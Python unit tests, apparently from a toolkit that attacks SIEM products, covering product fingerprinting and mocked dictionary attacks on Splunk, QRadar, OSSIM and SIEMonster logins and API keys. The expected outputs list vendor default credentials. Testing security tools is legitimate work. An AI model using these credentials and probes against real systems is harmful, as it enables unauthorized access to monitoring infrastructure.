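        self.url_base = 'https://192.168.1.8:443'
        self.stdout = 'sys.stdout'

    @requests_mock.mock()
    def test_ossim_brute(self, response):
        """Dictionary attack reports admin/ossim when the login redirects.

        ``POST /ossim/session/login.php`` is mocked to answer 302, which the
        module treats as a successful login (every attempt succeeds under this
        mock, so the banner shows the first pair tried; expected admin/ossim).
        """
        url = self.url_base + "/ossim/session/login.php"
        result = "\n\n\x1b[32m\x1b[1m[*] =================================" \
                 "========================================================" \
                 "===================== [*]" \
                 "\n\x1b[32m\x1b[1m[!] Dictionary Attack Successful!" \
                 "\n\x1b[32m\x1b[1m[*] ====================================" \
                 "=========================================================" \
                 "================= [*]" \
                 "\x1b[0m\n\n\n\x1b[32m\x1b[1m[*] ========================" \
                 "=========================================================" \
                 "============================= [*]" \
                 "\n\x1b[33m\x1b[1m[!] Username: \x1b[31m\x1b[1madmin" \
                 "\n\x1b[33m[!] Password: \x1b[31m\x1b[1mossim" \
                 "\n\x1b[32m\x1b[1m[*] ===================================" \
                 "=========================================================" \
                 "================== [*]\x1b[0m\n"

        response.post(url, status_code=302)
        with patch(self.stdout, new=StringIO()) as ossim_out:
            ossim_brute(self.ip, self.port)
        self.assertEqual(ossim_out.getvalue(), result)


if __name__ == "__main__":
    unittest.main()

# %%%%%%%%%% The End %%%%%%%%%%#


--------------------------------------------------------------------------------
/test/test_qradar.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# -*- coding: utf-8 -*-

import unittest
import requests_mock

from io import StringIO
from unittest.mock import patch

from qradar.bruteforceqradar import qradar_brute
from qradar.apikeybruteqradar import qradar_apikeybrute


class TestSiemsframework(unittest.TestCase):
    """Tests for the IBM QRadar modules; HTTP goes through requests_mock."""

    def setUp(self):
        # Not referenced by the tests in this file; kept as a fixture.
        self.inputs = 'siemsframework.input'
        self.ip = '192.168.1.8'
        self.port = '443'
        self.url_base = 'https://192.168.1.8:443'
        self.stdout = 'sys.stdout'

    @requests_mock.mock()
    def test_qradar_brute(self, session):
        """Console login dictionary attack reports admin/qradar.

        ``GET /console/`` is mocked with a ``Set-Cookie`` header (presumably
        the brute-force routine reads a CSRF cookie from it -- confirm against
        qradar/bruteforceqradar.py) and ``POST /console/j_security_check`` is
        mocked to status 322. NOTE(review): 322 is not a standard HTTP status;
        a real QRadar redirect is 302. Whatever the module checks for must
        match this value, otherwise the test passes for the wrong reason.
        """
        url = self.url_base + '/console/'
        auth = self.url_base + "/console/j_security_check"
        headers = {
            'QRadarCSRF': 'null',
            'Set-Cookie': 'CSRF=8746737hy749; Max'
        }

        result = "\n\n\x1b[32m\x1b[1m[*] ==============================" \
                 "=======================================================" \
                 "========================= [*]" \
                 "\n\x1b[32m\x1b[1m[!] Dictionary Attack Successful!" \
                 "\n\x1b[32m\x1b[1m[*] ===================================" \
                 "========================================================" \
                 "=================== [*]" \
                 "\x1b[0m\n\n\n\x1b[32m\x1b[1m[*] ==========================" \
                 "========================================================" \
                 "============================ [*]" \
                 "\n\x1b[33m\x1b[1m[!] Username: \x1b[31m\x1b[1madmin" \
                 "\n\x1b[33m[!] Password: \x1b[31m\x1b[1mqradar" \
                 "\n\x1b[32m\x1b[1m[*] =================================" \
                 "========================================================" \
                 "===================== [*]\x1b[0m\n"

        session.get(url, headers=headers)
        session.post(auth, status_code=322)

        with patch(self.stdout, new=StringIO()) as qrbrute_out:
            qradar_brute(self.ip, self.port)
        self.assertEqual(qrbrute_out.getvalue(), result)

    @requests_mock.mock()
    def test_qradar_apikeybrute(self, response):
        """API-key dictionary attack prints the first key the API accepts.

        ``GET /api/system/servers`` is mocked to 200 for any key, so the
        banner shows the key the module tries first (expected value below,
        presumably the first entry of qradar/apikeys.txt). The key is a test
        fixture, not a live credential.
        """
        url = self.url_base + "/api/system/servers"

        response.get(url, status_code=200)

        result = "\n\n\x1b[32m\x1b[1m[*] ===============================" \
                 "=======================================================" \
                 "======================== [*]" \
                 "\n\x1b[32m\x1b[1m[!] Dictionary Attack Successful!" \
                 "\n\x1b[32m\x1b[1m[*] =====================================" \
                 "==========================================================" \
                 "=============== [*]" \
                 "\x1b[0m\n\x1b[32m\x1b[22m[*] =============================" \
                 "==========================================================" \
                 "======================= [*]" \
                 "\n[!] API Key: \x1b[31m\x1b[1m784fba0a-784b-2d3d-a4ba" \
                 "-97f4cc1a7d70" \
                 "\n\x1b[32m\x1b[22m[*] ===================================" \
                 "=========================================================" \
                 "================== [*]\x1b[0m\n"

        with patch(self.stdout, new=StringIO()) as qradar_out:
            qradar_apikeybrute(self.ip, self.port)
        self.assertEqual(qradar_out.getvalue(), result)


if __name__ == "__main__":
    unittest.main()

# %%%%%%%%%% The End %%%%%%%%%%#


--------------------------------------------------------------------------------
/test/test_scanning.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# -*- coding: utf-8 -*-

import unittest
import scanning
import requests_mock

from unittest.mock import patch


class TestSIEMFramework(unittest.TestCase):
    """Tests for the input helpers and product-detection probes in scanning.py."""
    maxDiff = None

    def setUp(self):
        self.ip = '192.168.1.8'
        self.port = '443'
        self.inputs = 'builtins.input'
        self.url_base = 'https://192.168.1.8:443'

    def test_input_ip(self):
        """input_ip returns a valid dotted quad unchanged and '' for an invalid one."""
        result_true = '10.1.16.200'
        result_false = ''
        with patch(self.inputs, return_value='10.1.16.200'):
            ip_true = scanning.input_ip()
        self.assertEqual(ip_true, result_true)

        with patch(self.inputs, return_value='1000.1.10.300'):
            ip_false = scanning.input_ip()
        self.assertEqual(ip_false, result_false)

    def test_input_port(self):
        """input_port: empty input -> 0, a valid port -> the string, out of range -> ''.

        Note the mixed return types (int default, str otherwise); callers of
        ``scanning.input_port`` have to cope with both.
        """
        result_default = 0
        result_true = '8888'
        result_false = ''
        with patch(self.inputs, return_value=''):
            port_default = scanning.input_port()
        self.assertEqual(port_default, result_default)

        with patch(self.inputs, return_value='8888'):
            port_true = scanning.input_port()
        self.assertEqual(port_true, result_true)

        # The original test called scanning.input_ip() here, which returns ''
        # for any non-IP string, so the out-of-range port path of input_port
        # was never exercised. Call the function actually under test.
        with patch(self.inputs, return_value='1000110300'):
            port_false = scanning.input_port()
        self.assertEqual(port_false, result_false)

    def test_input_net(self):
        """input_net returns a CIDR network string unchanged."""
        result = '192.168.1.0/24'
        with patch(self.inputs, return_value='192.168.1.0/24'):
            net = scanning.input_net()
        self.assertEqual(net, result)

    # The detection probes below build their own URL scheme/port (https for
    # Splunk 8089, plain http for Graylog 9000 and Kibana 5601), so the mocked
    # URLs must match exactly what scanning.py requests.

    @requests_mock.mock()
    def test_splunk_detect(self, response):
        """A body containing 'splunkd' on https://host:8089 is detected as Splunk."""
        self.port = '8089'
        response.get('https://192.168.1.8:8089', text='splunkd')
        result = 'Splunk'
        self.assertEqual(scanning.splunk_detect(self.ip, self.port), result)

    @requests_mock.mock()
    def test_graylog_detect(self, response):
        """A body containing 'Graylog Web Interface' on http://host:9000 is Graylog."""
        self.port = '9000'
        response.get('http://192.168.1.8:9000', text='Graylog Web Interface')
        result = 'Graylog'
        self.assertEqual(scanning.graylog_detect(self.ip, self.port), result)

    @requests_mock.mock()
    def test_ossim_detect(self, response):
        """The OSSIM login page body identifies an AlienVault OSSIM host."""
        response.get(self.url_base + '/ossim/session/login.php',
                     text='AlienVault OSSIM')
        result = 'OSSIM'
        self.assertEqual(scanning.ossim_detect(self.ip, self.port), result)

    @requests_mock.mock()
    def test_qradar_detect(self, response):
        """A 'Server: QRadar' header on /console/ identifies QRadar."""
        response.get(self.url_base + '/console/', headers={'Server': 'QRadar'})
        result = 'QRadar'
        self.assertEqual(scanning.qradar_detect(self.ip, self.port), result)

    @requests_mock.mock()
    def test_mcafee_detect(self, response):
        """A body containing 'McAfee SIEM' on the base URL identifies McAfee ESM."""
        response.get(self.url_base, text='McAfee SIEM')
        result = 'McAfee'
        self.assertEqual(scanning.mcafee_detect(self.ip, self.port), result)

    @requests_mock.mock()
    def test_elasticsiem_detect(self, response):
        """A 'kbn-name' header on /app/siem (port 5601) identifies Elastic SIEM."""
        self.port = '5601'
        response.get('http://192.168.1.8:5601' + '/app/siem',
                     headers={'kbn-name': 'elasticsiem'}, text='Elastic')
        result = 'ElasticSIEM'
        self.assertEqual(scanning.elasticsiem_detect(self.ip, self.port),
                         result)

    def test_scan_host(self):
        """scan_host returns the string 'None' when nothing is detected.

        NOTE(review): nothing is patched here. The SSH tests in this suite
        patch ``nmap.PortScanner.scan``, so if ``scan_host`` drives nmap the
        same way this test performs a real scan of 192.168.1.8 every time
        the suite runs (and its result depends on the test network). Patch
        the scanner, as test_mcafee_ssh_brute does, once scanning.scan_host's
        use of nmap is confirmed.
        """
        result = 'None'
        self.assertEqual(scanning.scan_host(self.ip, self.port), result)


if __name__ == "__main__":
    unittest.main()

# %%%%%%%%%% The End %%%%%%%%%%#


--------------------------------------------------------------------------------
/test/test_siemonster.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# -*- coding: utf-8 -*-

import unittest
import requests_mock

from io import StringIO
from unittest.mock import patch

from siemonster.bfssh_smonster import smonster_ssh_bf


class TestSiemsframework(unittest.TestCase):
    """Tests for the SIEMonster modules; scanning and SSH are mocked.

    A copy of test_mcafee's web brute-force test used to sit in this class
    body as a dead triple-quoted string; it referenced ``mcafee_brute``,
    which this file never imports, and was removed.
    """

    def setUp(self):
        self.ip = '192.168.0.30'
        self.port = '443'
        self.url_base = 'https://siemonster.internal.co'
        self.stdout = 'sys.stdout'
        # Browser-like request headers. Not referenced by the tests in this
        # file; kept as a fixture for future tests.
        self.headers = {
            'Accept': 'application/json,text/plain,*/*',
            'DNT': '1',
            'Host': self.ip,
            'Origin': self.url_base,
            'Referer': self.url_base,
            'Content-Type': 'application/json;charset=utf-8',
            'Connection': 'keep - alive',
            'X-Xsrf-Token': 'null'
        }

    def test_smonster_ssh_bf(self):
        """SSH dictionary attack with a canned nmap result and a no-op connect.

        ``nmap.PortScanner.scan`` is patched to return ``nm`` and
        ``paramiko.SSHClient.connect`` to a no-op, so no scan or SSH session
        is started. The canned result describes 192.168.1.8 while the test
        targets 192.168.0.30 (``self.ip``); together with the ``_scan_result``
        assignment landing on the mock rather than the PortScanner instance,
        that is presumably why the expected banner is "Not Successful" --
        confirm against siemonster/bfssh_smonster.py.
        """
        nm = {
            'nmap': {
                'command_line': 'nmap -oX - -sT -T4 -p 22 192.168.1.8',
                'scaninfo': {
                    'tcp': {'method': 'connect', 'services': '22'}},
                'scanstats': {
                    'timestr': 'Sat May 16 17:00:54 2020',
                    'elapsed': '0.03', 'uphosts': '1', 'downhosts': '0',
                    'totalhosts': '1'}
            },
            'scan': {
                '192.168.1.8': {
                    'hostnames': [{'name': '', 'type': ''}],
                    'addresses': {'ipv4': '192.168.1.8'},
                    'vendor': {},
                    'status': {'state': 'up', 'reason': 'syn-ack'},
                    'tcp': {
                        22: {
                            'state': 'open',
                            'reason': 'syn-ack',
                            'name': 'ssh',
                            'product': '',
                            'version': '',
                            'extrainfo': '',
                            'conf': '3',
                            'cpe': ''}}}}}
        result = "\n\n\x1b[32m\x1b[1m[*] =================================" \
                 "========================================================" \
                 "===================== [*]" \
                 "\n\x1b[31m\x1b[1m[!] Dictionary Attack Not Successful" \
                 "\n\x1b[32m\x1b[1m[*] ====================================" \
                 "========================================================" \
                 "================== [*]\x1b[0m\n"

        with patch('sys.stdout', new=StringIO()) as smonster_out, \
                patch('nmap.PortScanner.scan') as mock_nmap, \
                patch('paramiko.SSHClient.connect', autospec=True) as mock_ssh:
            mock_nmap.return_value = nm
            mock_nmap._scan_result = nm
            mock_ssh.return_value = True
            smonster_ssh_bf(self.ip)
        self.assertEqual(smonster_out.getvalue(), result)


if __name__ == "__main__":
    unittest.main()

# %%%%%%%%%% The End %%%%%%%%%%#


--------------------------------------------------------------------------------
/test/test_siemsframework.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# -*- coding: utf-8 -*-

import unittest

import siemsframework
from unittest.mock import call
from unittest.mock import patch


class TestSiemsframework(unittest.TestCase):
    """Tests for the interactive menu in siemsframework.py.

    ``input`` is patched at ``siemsframework.input`` so no prompt blocks;
    ``menus`` is expected to hand back whatever the (patched) input returned.
    """
    # Class-level copy of the patch target: decorators below are evaluated at
    # class-definition time, before setUp runs.
    inputs = 'siemsframework.input'

    def setUp(self):
        self.inputs = 'siemsframework.input'
        self.options = ['Splunk', 'Graylog', 'OSSIM', 'QRadar', 'McAfee']

    def test_menus_options(self):
        """Each product name typed at the prompt is returned by menus()."""
        for option in self.options:
            with patch(self.inputs, return_value=option):
                value_expect = option
                return_value = siemsframework.menus(menu=option)

            self.assertEqual(value_expect, return_value)

    @patch(inputs, return_value='1')
    def test_menus_option_1(self, mock):
        """Numeric choice '1' is returned and input() is consulted exactly once."""
        value_expect = '1'
        return_value = siemsframework.menus(menu=1)

        self.assertEqual(value_expect, return_value)
        self.assertEqual(mock.call_count, 1)

    @patch(inputs, return_value='2')
    def test_menus_option_2(self, mock):
        """Numeric choice '2' is returned and input() is consulted exactly once."""
        value_expect = '2'
        return_value = siemsframework.menus(menu=2)

        self.assertEqual(value_expect, return_value)
        self.assertEqual(mock.call_count, 1)


if __name__ == "__main__":
    unittest.main()
--------------------------------------------------------------------------------
/test/test_splunk.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# -*- coding: utf-8 -*-

import unittest
import requests_mock

from io import StringIO
from unittest.mock import patch

from splunk.testovacredentials import ova_credentials
from splunk.bruteforcesplunk import bruteforce_splunk


class TestSiemsframework(unittest.TestCase):
    """Tests for the Splunk modules; the SDK connect and SSH are patched."""

    def setUp(self):
        self.ip = '192.168.1.8'
        self.port = '8089'
        self.url_base = 'https://192.168.1.8:8089'
        self.stdout = 'sys.stdout'

    def test_bruteforce(self):
        """Management-port dictionary attack reports admin with no password.

        ``splunklib.client.connect`` is patched to return True for any
        credentials, so the banner shows the first pair the module tries
        (expected: admin / "no password"). No connection is made to 8089.
        """
        result = "\n\n\x1b[32m\x1b[1m[*] =================================" \
                 "========================================================" \
                 "===================== [*]" \
                 "\n\x1b[32m\x1b[1m[!] Dictionary Attack Successful!" \
                 "\n\x1b[32m\x1b[1m[*] ====================================" \
                 "=========================================================" \
                 "================= [*]" \
                 "\x1b[0m\n\n\n\x1b[32m\x1b[1m[*] =========================" \
                 "========================================================" \
                 "============================= [*]" \
                 "\n\x1b[33m\x1b[1m[!] Username: \x1b[31m\x1b[1madmin" \
                 "\n\x1b[33m[!] Password: \x1b[31m\x1b[1mno password" \
                 "\n\x1b[32m\x1b[1m[*] ===================================" \
                 "=========================================================" \
                 "================== [*]\x1b[0m\n"

        with patch(self.stdout, new=StringIO()) as splunk_out:
            with patch('splunklib.client.connect') as mock_connect:
                mock_connect.return_value = True
                bruteforce_splunk(self.ip, self.port)
        self.assertEqual(splunk_out.getvalue(), result)

    @patch('paramiko.SSHClient.connect', return_value=True)
    def test_ssh_ova_credential(self, mock_ssh):
        """The OVA default root/changemenow pair is reported when connect succeeds.

        ``paramiko.SSHClient.connect`` is patched via the decorator, so no SSH
        session is opened towards ``self.ip``.
        """
        user = 'root'
        password = 'changemenow'
        result = "\x1b[32m\x1b[22m[*] =================================" \
                 "========================================================" \
                 "===================== [*]" \
                 "\n\x1b[32m\x1b[22m[!] Splunk VMWare OVA SSH Default " \
                 "Credentials Found!" \
                 "\n\x1b[32m\x1b[22m[*] ====================================" \
                 "=========================================================" \
                 "================= [*]" \
                 "\x1b[0m\n\n\n\x1b[32m\x1b[1m[*] ============================" \
                 "=========================================================" \
                 "========================= [*]" \
                 "\n\x1b[33m\x1b[1m[!] Username: \x1b[31m\x1b[1mroot" \
                 "\n\x1b[33m[!] Password: \x1b[31m\x1b[1mchangemenow" \
                 "\n\x1b[32m\x1b[1m[*] ===================================" \
                 "=========================================================" \
                 "================== [*]\x1b[0m\n"

        with patch('sys.stdout', new=StringIO()) as splunk_out:
            ova_credentials(self.ip, user, password)
        self.assertEqual(splunk_out.getvalue(), result)


if __name__ == "__main__":
    unittest.main()

# %%%%%%%%%% The End %%%%%%%%%%#


--------------------------------------------------------------------------------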